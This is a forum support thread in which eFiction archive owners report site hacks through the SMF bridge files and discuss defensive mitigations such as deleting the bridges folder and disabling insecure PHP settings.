I've been dealing with some jerk attempting to exploit this all afternoon, though I didn't know exactly what they were trying to do until I found this report. I've deleted the SMF bridge files, since I wasn't actually using them, but is there anything else we should be doing? I have a bunch of stuff from my logs if you need it.
Sorry if this is the wrong place, btw. I can't exactly include any details here, either, so sorry about not following the template...
Thank you for reporting this, in the meantime I will advise everyone using the current included bridge to disable/remove it.
I've also had someone try and exploit that today.
I don't know if this is related at all since i have not bridged my efic to smf, although i was intending to, just havent got around to it yet.
Yesterday my smf was hacked and index page stolen. I have reported to the SMF team, so perhaps the vulnerability might be with them. I am running smf. 1.1.1 and will be updating to 1.1.2 probably tonight as that is supposed to have some security patches.
If i get any info back from them on how it was done, i can pass it along if it can help.
why is nothing ever easy?
url: http://www.pretendercentre.com/missingpieces/
php: 5.2.5 msql: 5.0.45-community
efic version: 3.4.3 latest patches: yes
bridges: none mods: challenges, displayword, beta-search
It is definitely an efiction problem, not an SMF problem. I've just had a look at the code in question, and I believe in order for an exploit to be sucessful:
- You must have register_globals turned on in your php.ini.
- Unless the hacker has some other means of uploading php source code to a file on your server, you must also have allow_url_include turned on in your php.ini
For a secure installation of PHP neither one of these should be turned on. register_globals was defaulted to on in older installations of PHP. allow_url_include has always had the default value of Off.
Turns out the hosting company that we're with caught this (at dracoandginny.com) and took some action to stop it. If you'd like me to forward the email along, I can do so, in case it would be of any help.
Turns out the hosting company that we're with caught this (at dracoandginny.com) and took some action to stop it. If you'd like me to forward the email along, I can do so, in case it would be of any help.
If you could please PM that info to Tammy, that would be most helpful.
It looks like my hack had something to do with this as well; my host got back to me with log traces, and all of the exploits were based on the bridges/ folder. I deleted mine from both my eFic installs, and my host help desk pointed me to this: http://secunia.com/advisories/24268/
Whoever hacked into my eFic also got into my email, and while I've managed to restore my eFic installs, I have yet to get access back to my email. π I hope the self-claimed "Moroccan Islamic Team" or something doesn't further hack into my life.
Best of luck to anyone also dealing with this... π
Archive: Dragonfayth
eFiction: 3.5.5/6
Latest Patch(es): Yes
bridged?: No
modified?: Yes
PHP: 7.4.25
MySQL: 5.7.32-35-log
Someone was nice enough to hack the main page on one of the new sites I'm building. Luckily it was only a redirect to the eFiction site.
I've deleted all the bridges from that directory. Is there anything else we can do to ensure security?
Turns out the hosting company that we're with caught this (at dracoandginny.com) and took some action to stop it. If you'd like me to forward the email along, I can do so, in case it would be of any help.
If you could please PM that info to Tammy, that would be most helpful.
Okay, I'll do that.
